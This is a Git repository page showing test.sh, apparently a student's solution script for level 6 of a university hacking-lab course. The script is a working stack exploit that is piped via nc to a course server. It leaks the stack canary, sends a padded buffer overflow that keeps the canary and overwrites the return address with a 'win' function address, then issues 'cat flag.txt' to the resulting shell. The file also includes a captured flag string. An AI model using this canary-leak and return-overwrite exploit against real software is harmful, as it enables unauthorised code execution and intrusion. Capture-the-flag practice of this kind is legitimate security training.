ejung/hacklab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
8d7ce9d468b16585b9bf37c8fa29e7f384cef5ca
hacklab/4/level6/test.sh
Eggert Jung a4dc06d7e1 howto execute
2026-01-06 15:57:31 +01:00

31 lines
724 B
Bash
Executable File
Raw Blame History

# : | { ./test.sh | nc binexp.stud12.hacklab.ias.tu-bs.de 4006; } > /dev/fd/0;
#objdump
#00000000004011d6 g F .text 000000000000003a win
OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #64
CMDCALL="\xd6\x11\x40\00\00\00\00\00"
read
read
printf "$OLDFLAG"
read
read
printf "$PADDING""AAAAAAAA\n"
read
read
read canary
>&2 echo "read canary: "$(echo "$canary" | hd)
read input
>&2 echo $input
>&2 echo "writing canary + exploit"
printf "\00$PADDING""1234567\00${canary:0:7}12345678$CMDCALL\n"
read input
>&2 echo "should be bye: "$input
printf "cat flag.txt\n"
read input
>&2 echo "should be shell: "$input
Reference in New Issue View Git Blame Copy Permalink